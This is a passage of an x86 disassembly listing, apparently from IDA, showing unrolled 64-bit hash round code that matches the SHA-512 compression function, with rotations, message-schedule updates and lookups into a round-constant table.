		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_11C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		shr	ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_158]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_11C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_154]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_148]
		not	ebx
		and	ebx, [esp+170h+var_14C]
		not	edi
		and	edi, [esp+170h+var_150]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B20[eax*8]
		adc	esi, ds:dword_420B24[eax*8]
		add	edx, [esp+170h+var_60]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_5C]
		add	ecx, edx
		mov	edx, [esp+170h+var_144]
		adc	edx, esi
		add	eax, ecx
		adc	[esp+170h+var_124], edx
		mov	[esp+170h+var_148], ecx
		mov	ecx, [esp+170h+var_140]
		mov	[esp+170h+var_144], edx
		mov	edx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	ebp, edx
		shrd	ebx, ebp, 1Ch
		xor	edi, edi
		or	edi, ebx
		mov	esi, ecx
		mov	ebx, edx
		shld	edx, ecx, 1Eh
		shr	ebp, 1Ch
		shl	esi, 4
		or	esi, ebp
		shr	ebx, 2
		shl	ecx, 1Eh
		xor	ebp, ebp
		or	ebx, ecx
		mov	[esp+170h+var_128], eax
		or	ebp, edx
		mov	ecx, [esp+170h+var_13C]
		xor	esi, ebp
		mov	ebp, [esp+170h+var_140]
		mov	edx, ecx
		shld	ecx, ebp, 19h
		xor	edi, ebx
		shr	edx, 7
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_98]
		and	ecx, [esp+170h+var_140]
		shl	ebp, 19h
		xor	ecx, [esp+170h+var_90]
		or	edx, ebp
		xor	edi, edx
		mov	edx, [esp+170h+var_94]
		and	edx, [esp+170h+var_13C]
		xor	esi, ebx
		xor	edx, [esp+170h+var_8C]
		add	edi, ecx
		adc	esi, edx
		add	[esp+170h+var_148], edi
		adc	[esp+170h+var_144], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41608D
		mov	eax, [esp+170h+var_A8]
		mov	ecx, [esp+170h+var_A4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_A4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_118]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_114]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_118]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_114]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_D8]
		adc	edx, [esp+170h+var_D4]
		add	ecx, [esp+170h+var_E0]
		adc	edx, [esp+170h+var_DC]
		mov	[eax+80h], ecx
		mov	[eax+84h], edx
		mov	eax, edx
		mov	[esp+170h+var_D4], eax
		mov	[esp+170h+var_14], eax
		mov	eax, [esp+170h+var_128]
		mov	[esp+170h+var_D8], ecx
		mov	[esp+170h+var_18], ecx
		jmp	short loc_4160A9
; ---------------------------------------------------------------------------

loc_41608D:				; CODE XREF: sub_415050+F41j
		mov	edx, [esp+170h+var_D8]
		mov	ecx, [esp+170h+var_D4]
		mov	[esp+170h+var_18], edx
		mov	[esp+170h+var_14], ecx

loc_4160A9:				; CODE XREF: sub_415050+103Bj
		mov	ecx, [esp+170h+var_124]
		mov	ebx, ecx
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_124]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_120]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_124]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_11C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_14C]
		not	ebx
		and	ebx, [esp+170h+var_154]
		not	edi
		and	edi, [esp+170h+var_158]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B28[eax*8]
		adc	esi, ds:dword_420B2C[eax*8]
		add	edx, [esp+170h+var_18]
		mov	eax, [esp+170h+var_150]
		adc	esi, [esp+170h+var_14]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_130], eax
		mov	[esp+170h+var_14C], ecx
		mov	[esp+170h+var_150], eax
		adc	[esp+170h+var_12C], ecx
		mov	eax, [esp+170h+var_144]
		mov	ecx, [esp+170h+var_148]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_148]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		xor	edx, edx
		or	edx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	ebp, [esp+170h+var_134]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_138]
		and	ebp, eax
		mov	eax, [esp+170h+var_13C]
		and	eax, [esp+170h+var_134]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		xor	ebx, edx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_150], edi
		adc	[esp+170h+var_14C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4162D1
		mov	eax, [esp+170h+var_C8]
		mov	ecx, [esp+170h+var_C4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_C4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_D0]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_CC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_D0]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_CC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_118]
		adc	edx, [esp+170h+var_114]
		add	ecx, [esp+170h+var_100]
		adc	edx, [esp+170h+var_FC]
		mov	[eax+88h], ecx
		mov	[eax+8Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_118], ecx
		mov	[esp+170h+var_114], eax
		mov	[esp+170h+var_48], ecx
		jmp	short loc_4162E0
; ---------------------------------------------------------------------------

loc_4162D1:				; CODE XREF: sub_415050+1196j
		mov	edx, [esp+170h+var_118]
		mov	eax, [esp+170h+var_114]
		mov	[esp+170h+var_48], edx

loc_4162E0:				; CODE XREF: sub_415050+127Fj
		mov	ecx, [esp+170h+var_12C]
		mov	ebx, ecx
		mov	[esp+170h+var_44], eax
		mov	eax, [esp+170h+var_130]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_12C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_128]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_12C]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_124]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_154]
		not	ebx
		and	ebx, [esp+170h+var_11C]
		not	edi
		and	edi, [esp+170h+var_120]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B30[eax*8]
		adc	esi, ds:dword_420B34[eax*8]
		add	edx, [esp+170h+var_48]
		mov	eax, [esp+170h+var_158]
		adc	esi, [esp+170h+var_44]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_138], eax
		mov	[esp+170h+var_154], ecx
		mov	[esp+170h+var_158], eax
		adc	[esp+170h+var_134], ecx
		mov	ecx, [esp+170h+var_150]
		mov	eax, [esp+170h+var_14C]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_150]
		mov	ebp, eax
		shld	ebp, ebx, 19h
		shl	ebx, 19h
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edx, edx
		or	edx, ebp
		xor	edi, ecx
		mov	ecx, [esp+170h+var_150]
		xor	esi, edx
		mov	edx, [esp+170h+var_140]
		mov	ebx, ecx
		xor	ebx, edx
		and	ebx, [esp+170h+var_148]
		mov	ebp, eax
		xor	ebp, [esp+170h+var_13C]
		and	eax, [esp+170h+var_13C]
		and	ebp, [esp+170h+var_144]
		and	ecx, edx
		xor	ebx, ecx
		xor	ebp, eax
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_158], edi
		adc	[esp+170h+var_154], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_41651B
		mov	eax, [esp+170h+var_D8]
		mov	ecx, [esp+170h+var_D4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_D4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_F0]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_EC]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_F0]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_EC]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_C8]
		adc	edx, [esp+170h+var_C4]
		add	ecx, [esp+170h+var_110]
		adc	edx, [esp+170h+var_10C]
		mov	[eax+90h], ecx
		mov	[eax+94h], edx
		mov	eax, edx
		mov	[esp+170h+var_C8], ecx
		mov	[esp+170h+var_C4], eax
		mov	[esp+170h+var_80], ecx
		jmp	short loc_416530
; ---------------------------------------------------------------------------

loc_41651B:				; CODE XREF: sub_415050+13D4j
		mov	edx, [esp+170h+var_C8]
		mov	eax, [esp+170h+var_C4]
		mov	[esp+170h+var_80], edx

loc_416530:				; CODE XREF: sub_415050+14C9j
		mov	ecx, [esp+170h+var_134]
		mov	ebx, ecx
		mov	[esp+170h+var_7C], eax
		mov	eax, [esp+170h+var_138]
		xor	esi, esi
		mov	edx, ecx
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		xor	ebx, ebx
		shr	edx, 9
		or	edx, edi
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_134]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		xor	edi, edi
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		mov	ebp, [esp+170h+var_130]
		xor	esi, ecx
		mov	ecx, [esp+170h+var_134]
		and	ebp, eax
		mov	edi, eax
		mov	eax, [esp+170h+var_12C]
		and	eax, ecx
		mov	ebx, ecx
		mov	ecx, [esp+170h+var_11C]
		not	ebx
		and	ebx, [esp+170h+var_124]
		not	edi
		and	edi, [esp+170h+var_128]
		xor	ebx, eax
		mov	eax, [esp+170h+var_15C]
		xor	edi, ebp
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B38[eax*8]
		adc	esi, ds:dword_420B3C[eax*8]
		add	edx, [esp+170h+var_80]
		mov	eax, [esp+170h+var_120]
		adc	esi, [esp+170h+var_7C]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_140], eax
		mov	[esp+170h+var_11C], ecx
		mov	[esp+170h+var_120], eax
		adc	[esp+170h+var_13C], ecx
		mov	ecx, [esp+170h+var_158]
		mov	eax, [esp+170h+var_154]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		xor	edi, edi
		or	edi, edx
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shr	edx, 2
		shl	ecx, 1Eh
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ebx, [esp+170h+var_158]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_14C]
		shl	ebx, 19h
		xor	esi, edx
		mov	edx, [esp+170h+var_150]
		mov	ecx, eax
		shr	ecx, 7
		or	ecx, ebx
		xor	edi, ecx
		mov	ecx, [esp+170h+var_158]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_148]
		and	edx, ecx
		mov	ecx, [esp+170h+var_14C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_144]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_120], edi
		adc	[esp+170h+var_11C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416761
		mov	eax, [esp+170h+var_E8]
		mov	ecx, [esp+170h+var_E4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_E4]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_118]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_114]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_118]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_114]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_108]
		adc	edx, [esp+170h+var_104]
		add	ecx, [esp+170h+var_F0]
		adc	edx, [esp+170h+var_EC]
		mov	[eax+98h], ecx
		mov	[eax+9Ch], edx
		mov	eax, edx
		mov	[esp+170h+var_F0], ecx
		mov	[esp+170h+var_EC], eax
		mov	[esp+170h+var_78], ecx
		jmp	short loc_416776
; ---------------------------------------------------------------------------

loc_416761:				; CODE XREF: sub_415050+1626j
		mov	edx, [esp+170h+var_F0]
		mov	eax, [esp+170h+var_EC]
		mov	[esp+170h+var_78], edx

loc_416776:				; CODE XREF: sub_415050+170Fj
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		mov	[esp+170h+var_74], eax
		mov	eax, [esp+170h+var_140]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_13C]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_13C]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_134]
		mov	edi, eax
		and	eax, [esp+170h+var_138]
		not	ebx
		and	ebx, [esp+170h+var_12C]
		not	edi
		and	edi, [esp+170h+var_130]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_124]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B40[eax*8]
		adc	esi, ds:dword_420B44[eax*8]
		add	edx, [esp+170h+var_78]
		mov	eax, [esp+170h+var_128]
		adc	esi, [esp+170h+var_74]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_148], eax
		mov	[esp+170h+var_124], ecx
		mov	[esp+170h+var_128], eax
		adc	[esp+170h+var_144], ecx
		mov	eax, [esp+170h+var_11C]
		mov	ecx, [esp+170h+var_120]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_120]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_154]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_158]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_120]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_150]
		and	edx, ecx
		mov	ecx, [esp+170h+var_154]
		xor	ebp, eax
		and	ebp, [esp+170h+var_14C]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_128], edi
		adc	[esp+170h+var_124], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_4169A9
		mov	eax, [esp+170h+var_C8]
		mov	ecx, [esp+170h+var_C4]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 13h
		xor	esi, esi
		or	esi, edi
		mov	edi, ecx
		shr	ebx, 13h
		mov	edx, eax
		mov	ebp, eax
		shld	ecx, ebp, 3
		shl	edx, 0Dh
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ecx
		mov	ecx, [esp+170h+var_C4]
		shrd	eax, ecx, 6
		add	ebp, ebp
		add	ebp, ebp
		add	ebp, ebp
		shr	edi, 1Dh
		or	edi, ebp
		xor	esi, edi
		xor	esi, eax
		mov	eax, [esp+170h+var_F8]
		xor	edx, ebx
		shr	ecx, 6
		xor	edx, ecx
		mov	ecx, [esp+170h+var_F4]
		mov	ebp, ecx
		mov	ebx, eax
		shrd	ebx, ebp, 8
		xor	edi, edi
		or	edi, ebx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		mov	ebx, eax
		shrd	eax, ecx, 1
		shl	esi, 18h
		shr	ebp, 8
		or	esi, ebp
		shr	ecx, 1
		xor	ebp, ebp
		or	ebp, eax
		mov	eax, [esp+170h+var_F8]
		shl	ebx, 1Fh
		or	ebx, ecx
		mov	ecx, [esp+170h+var_F4]
		shrd	eax, ecx, 7
		shr	ecx, 7
		xor	esi, ebx
		xor	edi, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
		add	ecx, edi
		adc	edx, esi
		add	ecx, [esp+170h+var_B8]
		adc	edx, [esp+170h+var_B4]
		add	ecx, [esp+170h+var_E8]
		adc	edx, [esp+170h+var_E4]
		mov	[eax+0A0h], ecx
		mov	[eax+0A4h], edx
		mov	eax, edx
		mov	[esp+170h+var_E8], ecx
		mov	[esp+170h+var_E4], eax
		mov	[esp+170h+var_68], ecx
		jmp	short loc_4169BE
; ---------------------------------------------------------------------------

loc_4169A9:				; CODE XREF: sub_415050+1868j
		mov	edx, [esp+170h+var_E8]
		mov	eax, [esp+170h+var_E4]
		mov	[esp+170h+var_68], edx

loc_4169BE:				; CODE XREF: sub_415050+1957j
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		mov	[esp+170h+var_64], eax
		mov	eax, [esp+170h+var_148]
		mov	edx, ecx
		xor	esi, esi
		shr	edx, 9
		mov	edi, eax
		shld	ebx, edi, 17h
		or	esi, ebx
		shl	edi, 17h
		or	edx, edi
		xor	ebx, ebx
		mov	ebp, eax
		shrd	ebp, ecx, 12h
		or	ebx, ebp
		mov	ebp, [esp+170h+var_144]
		xor	edx, ebx
		shr	ecx, 12h
		mov	edi, eax
		shl	edi, 0Eh
		or	edi, ecx
		xor	esi, edi
		xor	edi, edi
		mov	ebx, eax
		shrd	ebx, ebp, 0Eh
		or	edi, ebx
		xor	edx, edi
		shr	ebp, 0Eh
		mov	ecx, eax
		shl	ecx, 12h
		or	ecx, ebp
		xor	esi, ecx
		mov	ecx, [esp+170h+var_144]
		mov	ebx, ecx
		and	ecx, [esp+170h+var_13C]
		mov	edi, eax
		and	eax, [esp+170h+var_140]
		not	ebx
		and	ebx, [esp+170h+var_134]
		not	edi
		and	edi, [esp+170h+var_138]
		xor	ebx, ecx
		mov	ecx, [esp+170h+var_12C]
		xor	edi, eax
		mov	eax, [esp+170h+var_15C]
		add	edx, edi
		adc	esi, ebx
		add	edx, ds:dword_420B48[eax*8]
		adc	esi, ds:dword_420B4C[eax*8]
		add	edx, [esp+170h+var_68]
		mov	eax, [esp+170h+var_130]
		adc	esi, [esp+170h+var_64]
		add	eax, edx
		adc	ecx, esi
		add	[esp+170h+var_150], eax
		mov	[esp+170h+var_12C], ecx
		mov	[esp+170h+var_130], eax
		adc	[esp+170h+var_14C], ecx
		mov	eax, [esp+170h+var_124]
		mov	ecx, [esp+170h+var_128]
		mov	edx, ecx
		mov	ebx, eax
		shrd	edx, ebx, 1Ch
		mov	esi, ecx
		xor	edi, edi
		or	edi, edx
		mov	ebp, eax
		shld	ebp, ecx, 1Eh
		shr	ebx, 1Ch
		shl	esi, 4
		or	esi, ebx
		mov	edx, eax
		shl	ecx, 1Eh
		shr	edx, 2
		xor	ebx, ebx
		or	edx, ecx
		or	ebx, ebp
		xor	edi, edx
		xor	esi, ebx
		mov	ecx, eax
		mov	ebx, [esp+170h+var_128]
		xor	edx, edx
		mov	ebp, eax
		shld	ebp, ebx, 19h
		or	edx, ebp
		mov	ebp, [esp+170h+var_11C]
		shl	ebx, 19h
		shr	ecx, 7
		or	ecx, ebx
		xor	esi, edx
		mov	edx, [esp+170h+var_120]
		xor	edi, ecx
		mov	ecx, [esp+170h+var_128]
		mov	ebx, edx
		xor	ebx, ecx
		and	ebx, [esp+170h+var_158]
		and	edx, ecx
		mov	ecx, [esp+170h+var_11C]
		xor	ebp, eax
		and	ebp, [esp+170h+var_154]
		and	ecx, eax
		xor	ebx, edx
		xor	ebp, ecx
		add	edi, ebx
		adc	esi, ebp
		add	[esp+170h+var_130], edi
		adc	[esp+170h+var_12C], esi
		cmp	[esp+170h+var_15C], 0
		jz	loc_416BF1
		mov	eax, [esp+170h+var_B0]
		mov	ecx, [esp+170h+var_AC]
		mov	ebx, ecx
		mov	edi, eax
		shrd	edi, ebx, 8
		mov	ebp, eax
		shrd	ebp, ecx, 1
		xor	esi, esi
		or	esi, edi
		shr	ecx, 1
		mov	edi, eax
		mov	edx, eax
		shr	ebx, 8
		shl	edi, 1Fh
		or	edi, ecx
		mov	ecx, [esp+170h+var_AC]
		shrd	eax, ecx, 7
		shl	edx, 18h
		or	edx, ebx
		xor	ebx, ebx
		or	ebx, ebp
		xor	esi, ebx
		xor	esi, eax
		mov	eax, [esp+170h+var_F0]
		xor	edx, edi
		shr	ecx, 7
		xor	edx, ecx
		mov	ecx, [esp+170h+var_EC]
		mov	ebx, eax
		mov	ebp, ecx
		shrd	ebx, ebp, 13h
		xor	edi, edi
		or	edi, ebx
		mov	ebx, ecx
		mov	[esp+170h+var_160], esi
		mov	esi, eax
		shld	ecx, eax, 3
		add	eax, eax
		add	eax, eax
		shl	esi, 0Dh
		shr	ebp, 13h
		or	esi, ebp
		add	eax, eax
		shr	ebx, 1Dh
		or	ebx, eax
		mov	eax, [esp+170h+var_F0]
		xor	ebp, ebp
		or	ebp, ecx
		mov	ecx, [esp+170h+var_EC]
		shrd	eax, ecx, 6
		shr	ecx, 6
		xor	esi, ebp
		xor	edi, ebx
		xor	esi, ecx
		mov	ecx, [esp+170h+var_160]
		xor	edi, eax
		mov	eax, [esp+170h+arg_0]
